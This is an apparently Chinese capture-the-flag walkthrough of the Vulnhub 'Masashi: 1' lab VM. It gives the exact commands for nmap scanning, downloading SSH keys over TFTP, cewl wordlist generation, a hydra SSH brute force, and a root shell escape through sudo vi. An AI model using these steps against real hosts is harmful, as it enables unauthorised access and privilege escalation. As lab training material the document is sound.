Vulnhub: Masashi: 1靶机

ctostm2023-09-08 9:54

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

复制代码 
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

查看80端口的robots.txt提示三个文件

snmpwalk.txt内容,tftp服务在1337端口

sshfolder.txt内容,提示用户名sv5

tftp连接目标下载id_rsaid_rsa.pub

复制代码 
tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

复制代码 
cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

提权

sv5用户sudo权限

提升为root

复制代码 
sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

flag

相关推荐
谪星·阿凯2 分钟前
公益SRC漏洞挖掘全指南博客
网络·安全·web安全
黑牛儿8 分钟前
K8s 1.36 新特性解读:服务网格如何解决微服务安全与通信难题?生产级对比
安全·微服务·kubernetes
黎阳之光10 分钟前
【从虚拟到实体:黎阳之光实时三维重构,开启AI空间智能新纪元
大数据·人工智能·算法·安全·数字孪生
好家伙VCC21 分钟前
**TEE在嵌入式安全中的应用实践:基于ARM TrustZone的加密存储方案设计与实现*
java·arm开发·python·struts·安全
zjeweler23 分钟前
“网安+护网”终极300多问题面试笔记-2共3-计算机网络相关 - 好淘云
笔记·计算机网络·web安全·面试·职场和发展·护网行动·护网面试
信创DevOps先锋36 分钟前
DevOps工具链选型新趋势:本土化适配与安全可控成企业核心考量
运维·安全·devops
2401_8322981042 分钟前
OpenClaw×HappyHorse 深度融合:AI 视频自动化量产,重构内容生产范式
人工智能·安全
老张的张Z44 分钟前
CISSP 域4知识点 网络安全架构安全
安全·web安全·架构
想你依然心痛1 小时前
HarmonyOS 5.0金融科技开发实战:构建硬件级安全数字钱包与分布式智能支付系统
安全·金融·harmonyos
万世浮华戏骨1 小时前
Web 后端 Python 基础安全
前端·python·安全
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04GPT-6核心能力解析及与现有主流大模型对比05基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手08CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南09LLM Wiki:让大模型替你打理知识库的完整指南10AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析